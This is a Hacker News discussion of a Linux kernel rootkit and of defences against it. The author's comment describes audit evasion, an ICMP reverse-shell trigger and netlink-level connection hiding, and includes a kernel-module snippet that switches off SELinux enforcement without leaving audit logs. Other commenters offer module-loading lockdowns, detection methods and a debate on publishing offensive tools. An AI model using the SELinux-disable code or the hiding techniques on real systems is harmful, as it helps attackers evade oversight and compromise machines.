10 comments

  • mmh0000 1 day ago
    Hiding from SELinux is clever, but SELinux (for most users not running MLS) is a final level of defense. If you get to the point where SELinux is saving your butt, you've got problems higher up in the stack.

    For me, the really scary part is the "Audit Evasion" (for those not in the know, here's a link: https://www.redhat.com/en/blog/configure-linux-auditing-audi...).

    Audit is supposed to be able to track anything and everything that happens on a Linux box. Every login, application, socket, syscall, all of it. The fact that they can bypass it is HUGE. You're not supposed to be able to disable auditd without rebooting the system (when correctly configured). And rebooting the system should* trigger other alarms for the security team.

    • kpcyrd 1 day ago
      The rootkit runs in ring0; at that point all kernel-enforced security controls are potentially compromised. Instead, you need to prevent the kernel module from being loaded in the first place. There are multiple ways to ensure no further kernel modules can be loaded without rebooting the computer, e.g. by having pid 1 drop CAP_SYS_MODULE out of its bounding set before starting any child processes. Once it has been loaded, it's too late to do anything about the integrity of your system.
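
      Roughly, the idea looks like this - a minimal sketch, not taken from any particular init implementation; the /sbin/real-init path is just a placeholder, and a real pid 1 would also clear the capability from its own permitted/effective sets and handle errors properly:

          /* Sketch: pid 1 drops CAP_SYS_MODULE from the capability bounding
           * set (requires CAP_SETPCAP). After this, nothing that goes through
           * execve() can (re)gain the capability, so init_module() and
           * finit_module() fail with EPERM for every service it starts. */
          #include <sys/prctl.h>
          #include <linux/capability.h>
          #include <unistd.h>
          #include <stdio.h>

          int main(void)
          {
              if (prctl(PR_CAPBSET_DROP, CAP_SYS_MODULE, 0, 0, 0) != 0) {
                  perror("PR_CAPBSET_DROP");
                  return 1;
              }

              /* ...carry on with normal init duties, then start services... */
              execv("/sbin/real-init", (char *[]){ "/sbin/real-init", NULL });
              return 1;
          }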
      • hugo1789 1 day ago
        That is a critical observation. Last time I had to root an Android device it had pretty robust defenses like dm-verity and strict SELinux policies (correctly configured), and then everything collapsed because the system loaded an exfat kernel module from an unverified filesystem.

        Permitting user-loaded kernel modules effectively invalidates all other security measures.

        • stackghost 1 day ago
          I'm quite surprised to learn that Android allows this
    • finagler 1 day ago
      > SELinux (for most users not running MLS) is a final level of defense

      if so, why is it there at all?

      Years back when our team was dealing with weird permission issues on multiple levels due to SELinux, I found little value in it.

      • arcfour 12 hours ago
        I don't mean this to come off as rude, but how much did you know about SELinux?

        Because in my experience, when people are "dealing with weird...issues" and "[finding] little value in it" they usually don't understand what it is and how to use it.

        This makes any tool difficult to appreciate.

      • mmh0000 16 hours ago
        Don't misunderstand my original post. SELinux is AMAZING. But if SELinux in the default "targeted" policy is the thing that's protecting you, that's good, but it means there are some major bugs or misconfigurations higher up (e.g., in your web server).

        I assume you know what a network firewall is. Think of SELinux like a "System Call Firewall". SELinux will protect you from many so-called "zero-day" vulnerabilities. It watches every syscall an application makes, looks at its policy, and decides if that syscall should be allowed/denied. It is a good thing.

        However, SELinux is really not user-friendly, though it is extremely well documented and learnable (run `man -k selinux` to see all the man pages). Red Hat also has thorough documentation (https://docs.redhat.com/en/documentation/red_hat_enterprise_...)

        Specifically, regarding your "weird permission issues": that is a "problem" with SELinux; it doesn't surface errors well. The TL;DR: if you get a "permission denied" error and you've ruled out the obvious (i.e., filesystem permissions), then you need to know to blame SELinux and look at the `/var/log/audit/audit.log` file.

        That file is technically human readable, but there are tools that make it much easier, such as `ausearch` and `sealert -a`.

        ---

        https://danwalsh.livejournal.com/71122.html

        "Now this is a horrible exploit but as you can see SELinux would probably have protected a lot/most of your valuable data on your machine. It would buy you time for you to patch your system."

      • bitfilped 1 day ago
        ...as a last line of defense. MAC is also a stronger system than DAC to begin with, so a lot of places may opt to have it in place anyway to catch inexperienced/careless/lazy admin mistakes. Sorry you struggled with writing SELinux policies, but it's a very valuable tool when you run systems that are exposed to the internet or other hostile environments.
  • matheuzsec 1 day ago
    The rootkit now disables SELinux enforcing mode on-demand when the ICMP reverse shell is triggered, leaving zero audit logs.

    How it works: SELinux maintains a global kernel structure called selinux_state that contains the enforcement flag. The rootkit resolves this non-exported symbol via kallsyms at module load time, then directly writes enforcing = 0 when triggered. This bypasses the normal setenforce() interface entirely.

    The clever part is the dual-layer approach:

    * Hooks netlink_unicast to drop audit messages for hidden PIDs

    * Attempts to modify selinux_state->enforcing directly in kernel memory

    On kernels built with CONFIG_SECURITY_SELINUX_DEVELOP=y, SELinux enforcement may stop at the kernel decision level, while userspace tools continue to report enforcing mode and /var/log/audit/audit.log shows nothing.
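
    Roughly, the lookup-and-write looks like this - a simplified sketch, not the actual Singularity source. kallsyms_lookup_name() has to be recovered via a kprobe on kernels >= 5.7 where it is no longer exported, and the position of enforcing inside struct selinux_state (ENFORCING_INDEX below) varies by kernel version/config, so treat it as illustrative:

        #include <linux/kprobes.h>
        #include <linux/module.h>

        /* Illustrative only: where 'enforcing' sits inside struct
         * selinux_state depends on the kernel's config (e.g. whether
         * 'disabled' precedes it). Verify against your kernel headers. */
        #define ENFORCING_INDEX 0

        static unsigned long (*klookup)(const char *name);

        static int resolve_kallsyms(void)
        {
            /* kallsyms_lookup_name() is unexported; a registered kprobe
             * still hands back the symbol's address. */
            struct kprobe kp = { .symbol_name = "kallsyms_lookup_name" };

            if (register_kprobe(&kp) < 0)
                return -ENOENT;
            klookup = (unsigned long (*)(const char *))kp.addr;
            unregister_kprobe(&kp);
            return 0;
        }

        static int __init demo_init(void)
        {
            bool *state;

            if (resolve_kallsyms())
                return -ENOENT;
            state = (bool *)klookup("selinux_state");
            if (state)
                WRITE_ONCE(state[ENFORCING_INDEX], false); /* setenforce 0, no audit record */
            return 0;
        }

        static void __exit demo_exit(void) { }

        module_init(demo_init);
        module_exit(demo_exit);
        MODULE_LICENSE("GPL");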

    - Advanced Network Hiding

    Previous versions only hid TCP connections in /proc/net/tcp* by hooking tcp_seq_show, which was enough to fool netstat. But modern tools like ss and conntrack bypass /proc entirely - they query the kernel directly via netlink.

    The new version filters at the netlink layer:

    * SOCK_DIAG filtering: ss uses the NETLINK_SOCK_DIAG protocol to get socket info directly from the kernel. Singularity hooks recvmsg to intercept and filter these netlink responses before userspace sees them. Commands like ss -tapen or lsof -i return nothing for hidden connections. (A minimal sketch of what such a query looks like from userspace follows after this list.)

    * Conntrack filtering: Connection tracking (nf_conntrack) maintains state for all network flows. Reading /proc/net/nf_conntrack or running conntrack -L would expose hidden connections. The rootkit now filters both the proc interface and NETLINK_NETFILTER messages with conntrack types.

    * UDP hiding: Added hooks for udp4_seq_show and udp6_seq_show - previous versions only hid TCP.
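
    For context, this is roughly what ss does under the hood - a minimal userspace sketch of a NETLINK_SOCK_DIAG / inet_diag dump request (IPv4 TCP only, no error handling); these are exactly the reply messages a recvmsg hook has to filter to stay invisible:

        /* Ask the kernel for all IPv4 TCP sockets via NETLINK_SOCK_DIAG,
         * bypassing /proc entirely. */
        #include <linux/inet_diag.h>
        #include <linux/netlink.h>
        #include <linux/sock_diag.h>
        #include <arpa/inet.h>
        #include <netinet/in.h>
        #include <stdio.h>
        #include <sys/socket.h>
        #include <unistd.h>

        int main(void)
        {
            int fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG);
            struct {
                struct nlmsghdr nlh;
                struct inet_diag_req_v2 req;
            } msg = {
                .nlh = {
                    .nlmsg_len   = sizeof(msg),
                    .nlmsg_type  = SOCK_DIAG_BY_FAMILY,
                    .nlmsg_flags = NLM_F_REQUEST | NLM_F_DUMP,
                },
                .req = {
                    .sdiag_family   = AF_INET,
                    .sdiag_protocol = IPPROTO_TCP,
                    .idiag_states   = ~0U,          /* all TCP states */
                },
            };
            send(fd, &msg, sizeof(msg), 0);

            char buf[16384];
            for (;;) {
                int len = recv(fd, buf, sizeof(buf), 0);
                if (len <= 0)
                    break;
                for (struct nlmsghdr *h = (struct nlmsghdr *)buf; NLMSG_OK(h, len);
                     h = NLMSG_NEXT(h, len)) {
                    if (h->nlmsg_type == NLMSG_DONE)
                        return 0;
                    struct inet_diag_msg *d = NLMSG_DATA(h);
                    printf("inode %u  sport %u  dport %u\n", d->idiag_inode,
                           ntohs(d->id.idiag_sport), ntohs(d->id.idiag_dport));
                }
            }
            close(fd);
            return 0;
        }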

    - Other improvements:

    * Optimized log filtering (switched from multiple strstr() calls to switch-case with strncmp())

    * Audit statistics tracking (get_blocked_audit_count(), get_total_audit_count())

    * Automated setup script

    Repo: https://github.com/MatheuZSecurity/Singularity

    • transpute 1 day ago
      > The rootkit now disables SELinux enforcing mode on-demand when the ICMP reverse shell is triggered, leaving zero audit logs.

      Is this independent of the Linux Security Modules policy, e.g. RHEL default policy for SE Linux?

  • RandomGerm4n 1 day ago
    This does not seem to work with Fedora Atomic. Because the system is read-only, the kernel module cannot be loaded. You would have to create an RPM package for the rootkit that you can then layer. In addition, due to Secure Boot, the kernel module would have to be signed with the same key as the system itself.
    • wmf 1 day ago
      insmod can load a module from anywhere (surely /tmp is writable), even stdin. That's why you definitely want to block unknown kernel modules.
      • Joel_Mckay 1 day ago
        Most production OSes I've seen do this once boot-up completes:

        echo 1 > /proc/sys/kernel/modules_disabled

        Which is supposed to block dynamic module loading until a reboot.

        It would be interesting if the PoC can get around that trick too. =3

        • lima 1 day ago
          If Kernel Lockdown is enabled, a zero-day exploit is required to bypass module restrictions without a reboot.

          Unfortunately, threat actors tend to have a stash of them and the initial entry vector often involves one (container or browser sandbox escape), and once you have that, you are in ring 0 already and one flipped bit away from loading the module.

          The Linux kernel is not really an effective privilege boundary.

        • worthless-trash 19 hours ago
          Once you have memory write as ring0, all protections are dubious at best.

          Why bother loading a module when you can inject code into any function you want?

          • Joel_Mckay 17 hours ago
            The encrypted page memory manager hardware in some ancient Sun systems prevented a lot of these context isolation problems. However, the modern IT landscape chose consumer grade processor architecture and bodged GPUs as the cloud infrastructure foundation.

            Thus, there currently is economic inertia entrenching vulnerable system design. I don't think there is a company large enough to change the situation anytime soon, as the market has spoken. =3

            Rule #3: popularity is not an indication of utility.

        • worthless-trash 19 hours ago
          Or only allow signed kernel modules. Aka secure boot.

          This doesn't solve all vectors, but AFAICS it will prevent unsigned modules from loading.

  • kachapopopow 1 day ago
    The first thing that comes to mind is just grabbing CR3 and finding it in physical memory for detection.

    Also, this feels like a bit too much effort for something that was never used in the real world, not going to lie.

    The ICMP reverse shell is a really cool idea; no persistence makes it rather harmless compared to what is possible.

    • lima 1 day ago
      Red teams (internal or consultants) use this sort of tooling in the real world. Their job is to emulate a real, competent threat actor. APTs routinely use high-quality rootkits for EDR evasion.

      Persistence is actually quite rare nowadays - since it's the most easily detected part, red teams usually prefer to skip it and stay memory-only.

      • kachapopopow 1 day ago
        I guess it makes sense - as for persistence, I guess there's no point in having any if you can just compromise the target again.
        • ronsor 1 day ago
          Many servers and systems are rarely rebooted, and many campaigns are not that long term. There may not be a reason to compromise the target again.

          For example, a ransomware gang may compromise a company's network, steal data, deploy the cryptolocker, and then get out. There's no need to have persistent access; they got what they wanted.

          • kachapopopow 1 day ago
            I know that very well, considering I have servers with 5 years of uptime. But generally the environment isn't the same as it was: with cloud services living less than a few hours (or even seconds for functional endpoints), this becomes a problem.

            My first thought is that this is actually a vector against people rather than servers which do reboot daily.

  • mrbluecoat 1 day ago
    Impressively polished. Pair with BIOS/UEFI boot persistence and you've got a nasty infection.
    • Joel_Mckay 1 day ago
      Almost as bad as the Intel Management Engine. lol =3
  • hatmanstack 1 day ago
    This looks impressive. I haven't had a chance to give it a go, but I would love a consumable "counters" tutorial for this type of intrusion... "Be a researcher, not a criminal" might be wishful thinking.
  • egberts1 1 day ago
    Entry vector is via user-loadable kernel modules.

    Does not work if kernel Kconfig setting has:

        CONFIG_MODULES=n
    
    All deliverables should have this Kconfig setting disabled.
    • hulitu 1 day ago
      > CONFIG_MODULES=n

      does this work on normal Linux desktops? My impression was that either: 1) the kernel is too big ("try making modules" link error), or 2) the system will not boot due to missing/misconfigured parts.

      • Joel_Mckay 1 day ago
        Could always try:

        echo 1 > /proc/sys/kernel/modules_disabled

        Which is supposed to block dynamic module loading until a reboot. =3

        • matheuzsec 1 day ago
          This is not permanent; if the system is rebooted, it will be undone :)
  • bflesch 1 day ago
    Nice. Could it be detected by comparing output of `find /` at runtime with output of `find /` if you mount the disk on another system?
    • KZerda 1 day ago
      Yes. Offline is how a lot of rootkits are analyzed after the admin notices peculiar behavior. There are a lot of other checks that could be run online to find this rootkit though, most notably around its behavior with ftrace. Disabling ftrace and then running a program that uses ftrace would tell you right away that something's wrong.
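
      For example - a minimal sketch, assuming tracefs is mounted at the usual path and the rootkit doesn't also filter reads of it - on a box where nothing is deliberately tracing, any entries here mean someone has ftrace callbacks attached:

          /* Dump functions that currently have ftrace callbacks attached.
           * An ftrace-hook rootkit shows up here unless it also hides
           * itself from tracefs. Needs root. */
          #include <stdio.h>

          int main(void)
          {
              FILE *f = fopen("/sys/kernel/tracing/enabled_functions", "r");
              char line[256];
              int n = 0;

              if (!f) {
                  perror("enabled_functions (root? tracefs mounted?)");
                  return 1;
              }
              while (fgets(line, sizeof(line), f)) {
                  printf("hooked: %s", line);
                  n++;
              }
              fclose(f);
              printf("%d function(s) with ftrace callbacks attached\n", n);
              return 0;
          }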
      • bflesch 1 day ago
        Thanks. So for virtualized systems it would make sense to routinely clone the HDD and do such a comparison. Could easily be included in the backup software.
  • TacticalCoder 1 day ago
    Assuming someone manages to first get root, can kernels only allowing signed modules to be loaded (Talos does that if I'm not mistaken, for example) prevent that stealth rootkit from being loaded? Or can root just bypass that check?

    Or is the only line of defense a kernel compiled without the ability to load modules?

    I know all bets are off once someone already gained root, but not allowing the installation of a stealth rootkit is never bad.

    • wmf 1 day ago
      There are ways to block unsigned modules. You also need to lock down /dev/kmem which apparently distros already do.
  • VoidWhisperer 1 day ago
    I understand that this is to drive research and help security researchers in this case, but I personally think Github should take a harder stance against this kind of repo, education purposes or not - saying it is for educational purposes is definitely not going to stop someone (especially people who wouldn't know how to develop this level of rootkit on their own) from going and using it.

    Also, the specific details in the README along the lines of 'make sure you randomize this or you'll be detected!' make it feel even less like it is explicitly for educational purposes, since you are providing users easy instructions on how to work around countermeasures against this code.

    • mmh0000 1 day ago
      There are many responses to this, but I'll start with:

      Security through obscurity is not security [1]

      When only l33t underworld h4x0rz know about software flaws, there is very little incentive or ability for regular software developers to find and fix what enables these vulnerabilities. Only through shared knowledge can the world become a better place.

      [1] https://en.wikipedia.org/wiki/Security_through_obscurity

      • kpcyrd 1 day ago
        The second argument doesn't really work out in practice. We have a quarter century of knowledge about SQL injection at this point, yet it keeps happening.

        Instead of trying to educate everybody about how to safely use error-prone programming abstractions, we should de-normalize the use of them and come up with more robust ones. You don't need to have in-depth exploit development skills to write secure Rust code.

        Unfortunately, there's more money to be made selling security consulting if people stick to the error-prone ones.

    • sounds 1 day ago
      Do you think malware creators find out by reading HN or GitHub? I don't understand the vitriol; the request "Github should take a harder stance" could have a chilling effect on security researchers, pushing high-impact exploits deeper underground.
      • VoidWhisperer 1 day ago
        There isn't vitriol, or at least I didn't mean it that way. The point I was trying to make is that I've seen malicious code like viruses and keyloggers and rootkits being distributed via GitHub, and they use 'this is for education' as a cop-out when the rest of the repo makes it extremely obvious what the real intention is.
        • _QrE 1 day ago
          Malware is very easy to build. Competent threat actors don't need to rely on open source software, and incompetent ones can buy what they use from malware authors who sell their stuff in various forums. Concerns similar to yours about 'upgrading' the capabilities of threat actors were raised when NSA made Ghidra public, yet the NSA considers the move itself to have been good (https://www.nsa.gov/Press-Room/News-Highlights/Article/Artic...).

          People will build malware. It is actually both fun and educational. Them sharing it makes the world aware of it, and when people are aware of it, they tend to adjust their security posture for the better if they feel threatened by it. Good cybersecurity research & development raises the bar for the industry and makes the world more secure.

        • xpltr7 1 day ago
          Have you ever heard the phrase "To stop a hacker you have to think like a hacker"? That's cybersecurity 101. Without the hacker's knowledge or programs... you're just a victim or target. But with this knowledge made available, now you are aware of this program/possibility. It's like when companies deploy honeypot servers to capture the methods & use cases of hackers attacking the server, to build stronger security against their methods and techniques.